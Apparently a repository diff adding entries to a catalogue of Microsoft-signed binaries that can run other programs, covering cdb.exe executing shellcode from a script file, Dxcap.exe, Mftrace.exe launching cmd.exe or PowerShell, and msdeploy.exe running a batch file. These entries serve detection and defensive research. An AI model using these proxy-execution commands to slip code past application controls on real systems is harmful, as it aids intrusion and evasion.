cdb.exe -cf x64_calc.wds -o notepad.exe
Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.
```
* Resources:
* http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
* https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
* https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
* Full path:
* C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
* C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
* Notes: Thanks to Matt Graeber - @mattifestation

17
OtherMSBinaries/Dxcap.exe.md Normal file
View File

@ -0,0 +1,17 @@
## Dxcap.exe
* Functions: Execute
```
Dxcap.exe -c C:\Windows\System32\notepad.exe
Launch notepad as a subprocess of Dxcap.exe
```
* Resources:
* https://twitter.com/harr0ey/status/992008180904419328
* Full path:
* c:\Windows\System32\dxcap.exe
* c:\Windows\SysWOW64\dxcap.exe
* Notes: Thanks to Matt harr0ey - @harr0ey

22
OtherMSBinaries/Mftrace.exe.md Normal file
View File

@ -0,0 +1,22 @@
## Mftrace.exe
* Functions: Execute
```
Mftrace.exe cmd.exe
Launch cmd.exe as a subprocess of Mftrace.exe.
Mftrace.exe powershell.exe
Launch cmd.exe as a subprocess of Mftrace.exe.
```
* Resources:
* https://twitter.com/0rbz_/status/988911181422186496 (Currently not accessible)
* Full path:
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64
* C:\Program Files (x86)\Windows Kits\10\bin\x86
* C:\Program Files (x86)\Windows Kits\10\bin\x64
* Notes: Thanks to fabrizio - @0rbz_

16
OtherMSBinaries/Msdeploy.exe.md Normal file
View File

@ -0,0 +1,16 @@
## Msdeploy.exe
* Functions: Execute
```
msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
Launch calc.bat via msdeploy.exe.
```
* Resources:
* https://twitter.com/pabraeken/status/995837734379032576
* Full path:
* C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

Some files were not shown because too many files have changed in this diff Show More